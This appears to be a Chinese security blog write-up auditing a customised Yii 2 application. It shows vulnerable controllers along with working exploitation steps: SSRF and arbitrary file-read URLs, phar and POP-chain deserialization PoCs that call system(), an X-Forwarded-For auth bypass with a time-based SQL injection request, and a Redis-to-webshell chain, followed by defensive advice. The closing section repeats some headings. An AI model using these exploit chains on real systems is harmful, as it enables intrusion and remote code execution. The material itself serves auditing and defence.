Yii框架代码审计与漏洞利用实战<\/h1>

1. 系统概述<\/h2>
审计目标是一个基于Yii框架二次开发的大型系统，包含多个子系统。系统采用Yii 2.0.45版本框架，并进行了自定义修改。<\/p>

2. 漏洞发现与分析<\/h2>

2.1 前台SSRF漏洞<\/h3>
位置<\/strong>: center\/controllers\/DemoController.php<\/code><\/p>
漏洞代码<\/strong>:<\/p>
public<\/span> function<\/span> actionProxy<\/span>(){
<\/span><\/span>    $rs =<\/span> [];
<\/span><\/span>    if<\/span>(\Yii<\/span>::<\/span>$app-><\/span>request<\/span>-><\/span>isPost<\/span>){
<\/span><\/span>        $url =<\/span> \Yii<\/span>::<\/span>$app-><\/span>request<\/span>-><\/span>post<\/span>('url'<\/span>);
<\/span><\/span>        $post_data =<\/span> \Yii<\/span>::<\/span>$app-><\/span>request<\/span>-><\/span>post<\/span>();
<\/span><\/span>        $rs =<\/span> $this-><\/span>post<\/span>($url,$post_data);
<\/span><\/span>    }elseif<\/span> (\Yii<\/span>::<\/span>$app-><\/span>request<\/span>-><\/span>isGet<\/span>){
<\/span><\/span>        $url =<\/span> \Yii<\/span>::<\/span>$app-><\/span>request<\/span>-><\/span>get<\/span>('url'<\/span>);
<\/span><\/span>        $rs =<\/span> $this-><\/span>get<\/span>($url);
<\/span><\/span>    }
<\/span><\/span>    return<\/span> $rs;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>利用方式<\/strong>:<\/p>

直接请求内部服务: \/demo\/proxy?url=file:\/\/\/etc\/passwd<\/code><\/li>
读取Redis配置: \/demo\/proxy?url=file:\/\/\/xxxx\/etc\/system.conf<\/code><\/li>
<\/ul>
危害<\/strong>:<\/p>

读取任意文件<\/li>
探测内网服务<\/li>
结合其他服务实现RCE<\/li>
<\/ul>
2.2 未授权任意文件下载<\/h3>
位置<\/strong>: center\/modules\/user\/controllers\/GroupController.php<\/code><\/p>
漏洞代码<\/strong>:<\/p>
public<\/span> function<\/span> actionDownLoad<\/span>()
<\/span><\/span>{
<\/span><\/span>    if<\/span> (Yii<\/span>::<\/span>$app-><\/span>request<\/span>-><\/span>get<\/span>('file'<\/span>)) {
<\/span><\/span>        return<\/span> Yii<\/span>::<\/span>$app-><\/span>response<\/span>-><\/span>sendFile<\/span>(Yii<\/span>::<\/span>$app-><\/span>request<\/span>-><\/span>get<\/span>('file'<\/span>));
<\/span><\/span>    }
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>利用方式<\/strong>:<\/p>

直接下载文件: \/user\/group\/down-load?file=\/etc\/passwd<\/code><\/li>
结合phar协议触发反序列化: \/user\/group\/down-load?file=phar:\/\/.\/uploads\/monitor\/huahua.png<\/code><\/li>
<\/ul>
2.3 反序列化漏洞<\/h3>
POP Chain 1<\/h4>
利用链<\/strong>:<\/p>

setasign\Fpdi\PdfReader\PdfReader<\/code><\/li>
yii\redis\Connection<\/code><\/li>
yii\base\Component<\/code><\/li>
Opis\Closure<\/code> 反序列化执行任意代码<\/li>
<\/ol>
POC<\/strong>:<\/p>
<?<\/span>php<\/span> 
<\/span><\/span>namespace<\/span> yii\base<\/span> {
<\/span><\/span>    class<\/span> Component<\/span> {
<\/span><\/span>        private<\/span> $_events =<\/span> array<\/span>();
<\/span><\/span>        private<\/span> $_behaviors =<\/span> 1<\/span>;
<\/span><\/span>        public<\/span> function<\/span> __construct() {
<\/span><\/span>            include<\/span>(".\/vendor\/opis\/closure\/autoload.php"<\/span>);
<\/span><\/span>            $func =<\/span> function<\/span>(){
<\/span><\/span>                $cmd =<\/span> 'touch \/tmp\/success'<\/span>;
<\/span><\/span>                system<\/span>($cmd);
<\/span><\/span>            };
<\/span><\/span>            $raw =<\/span> \Opis\Closure\serialize<\/span>($func);
<\/span><\/span>            $data=<\/span>\Opis\Closure\unserialize<\/span>($raw);
<\/span><\/span>            $this-><\/span>_events<\/span> =<\/span> ["afterOpen"<\/span> =><\/span> [[$data, "huahua"<\/span>]]];
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>\/\/ ... 其他类定义 ...
<\/span><\/span><\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>POP Chain 2<\/h4>
利用链<\/strong>:<\/p>

setasign\Fpdi\PdfReader\PdfReader<\/code><\/li>
yii\redis\Connection<\/code><\/li>
yii\base\Component<\/code><\/li>
yii\rest\CreateAction<\/code> 调用system函数<\/li>
<\/ol>
POC<\/strong>:<\/p>
<?<\/span>php<\/span> 
<\/span><\/span>namespace<\/span> yii\rest<\/span> {
<\/span><\/span>    class<\/span> CreateAction<\/span> {
<\/span><\/span>        public<\/span> $id;
<\/span><\/span>        public<\/span> $checkAccess;
<\/span><\/span>        public<\/span> function<\/span> __construct() {
<\/span><\/span>            $this-><\/span>checkAccess<\/span> =<\/span> 'system'<\/span>;
<\/span><\/span>            $this-><\/span>id<\/span> =<\/span> "touch \/tmp\/success"<\/span>;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>\/\/ ... 其他类定义 ...
<\/span><\/span><\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>2.4 前台无条件RCE<\/h3>
位置<\/strong>: center\/modules\/strategy\/controllers\/IpController.php<\/code><\/p>
漏洞代码<\/strong>:<\/p>
public<\/span> function<\/span> actionBindIp<\/span>(){
<\/span><\/span>    $data1 =<\/span> unserialize<\/span>(Yii<\/span>::<\/span>$app-><\/span>request<\/span>-><\/span>post<\/span>('data1'<\/span>));
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>利用方式<\/strong>:<\/p>

构造恶意序列化数据<\/li>
POST请求\/strategy\/ip\/bind-ip<\/code>并附带payload<\/li>
<\/ol>
2.5 API接口SQL注入<\/h3>
位置<\/strong>: rest\/versions\/api\/immu\/controllers\/QueryController.php<\/code><\/p>
漏洞代码<\/strong>:<\/p>
$tableName =<\/span> sprintf<\/span>('srun_detail%s%s'<\/span>,"_"<\/span>,$time);
<\/span><\/span>$sql =<\/span> "select SUM(`total_bytes`) as `mysql_bytes` from `<\/span>$tableName<\/span>` where `user_name`='<\/span>$userName<\/span>'"<\/span>;
<\/span><\/span>$mysqlData =<\/span> Yii<\/span>::<\/span>$app-><\/span>db<\/span>-><\/span>createCommand<\/span>($sql)-><\/span>queryOne<\/span>();
<\/span><\/span><\/code><\/pre>权限绕过<\/strong>:<\/p>

访问\/api\/v8\/auth\/get-access-token<\/code>获取token<\/li>
请求时添加X-Forwarded-For: 127.0.0.1<\/code><\/li>
<\/ol>
利用方式<\/strong>:<\/p>
GET \/api\/immu\/query?access_token=FPFBWAk5llPf3Phd5drTiez9Uks1749J&user_name=test002&time=mobile_day`+where+user_name='test001'+union+select+1+and(select+sleep(3))%23
<\/code><\/pre>
3. 漏洞利用实战<\/h2>
3.1 SSRF到RCE利用链<\/h3>

通过SSRF读取Redis配置<\/li>
获取Redis密码和端口<\/li>
尝试Redis未授权访问或使用密码连接<\/li>
利用Redis写入Webshell<\/li>
<\/ol>
3.2 任意文件下载到反序列化RCE<\/h3>

寻找文件上传点(\/report\/system\/image-save<\/code>)<\/li>
上传恶意phar文件<\/li>
通过任意文件下载触发phar反序列化<\/li>
<\/ol>
上传点代码<\/strong>:<\/p>
public<\/span> function<\/span> actionImageSave<\/span>()
<\/span><\/span>{
<\/span><\/span>    $post =<\/span> Yii<\/span>::<\/span>$app-><\/span>request<\/span>-><\/span>post<\/span>();
<\/span><\/span>    $picInfo =<\/span> $post['baseimg'<\/span>];
<\/span><\/span>    $savingDir =<\/span> 'uploads\/monitor\/'<\/span>;
<\/span><\/span>    $streamFileRand =<\/span> $savingDir.<\/span>$post['sql_type'<\/span>].<\/span>$post['proc'<\/span>].<\/span>'.png'<\/span>;
<\/span><\/span>    preg_match<\/span>('\/(?<=base64,)[\S|\s]+\/'<\/span>,$picInfo,$picInfoW);
<\/span><\/span>    file_put_contents<\/span>($streamFileRand,base64_decode<\/span>($picInfoW[0<\/span>]));
<\/span><\/span>    return<\/span> true<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>4. 防御建议<\/h2>


SSRF防御<\/strong>:<\/p>

禁用危险协议(file:\/\/, gopher:\/\/等)<\/li>
对URL进行白名单校验<\/li>
禁用curl的跟随重定向<\/li>
<\/ul>
<\/li>

文件操作防御<\/strong>:<\/p>

对文件路径进行严格校验<\/li>
禁用危险协议(phar:\/\/等)<\/li>
设置文件下载权限检查<\/li>
<\/ul>
<\/li>

反序列化防御<\/strong>:<\/p>

避免直接反序列化用户输入<\/li>
使用白名单校验反序列化类<\/li>
更新依赖库修复已知漏洞<\/li>
<\/ul>
<\/li>

SQL注入防御<\/strong>:<\/p>

使用预处理语句<\/li>
对表名、字段名进行白名单校验<\/li>
使用框架提供的安全查询方法<\/li>
<\/ul>
<\/li>

权限验证强化<\/strong>:<\/p>

统一权限验证机制<\/li>
避免IP伪造(X-Forwarded-For信任问题)<\/li>
Token与IP绑定校验<\/li>
<\/ul>
<\/li>
<\/ol>
5. 总结<\/h2>
本次审计发现了Yii框架二次开发系统中的多个高危漏洞，包括SSRF、任意文件下载、反序列化RCE和SQL注入等。这些漏洞的组合利用可以导致系统完全沦陷。开发过程中应特别注意用户输入的过滤和验证，避免直接使用危险函数，并保持框架和依赖库的及时更新。<\/p>
Yii框架代码审计与漏洞利用实战<\/h1>

1. 系统概述<\/h2> 审计目标是一个基于Yii框架二次开发的大型系统，包含多个子系统。系统采用Yii 2.0.45版本框架，并进行了自定义修改。<\/p>

2. 漏洞发现与分析<\/h2>

2.3 反序列化漏洞<\/h3>

3. 漏洞利用实战<\/h2>

1. 系统概述<\/h2>
审计目标是一个基于Yii框架二次开发的大型系统，包含多个子系统。系统采用Yii 2.0.45版本框架，并进行了自定义修改。<\/p>
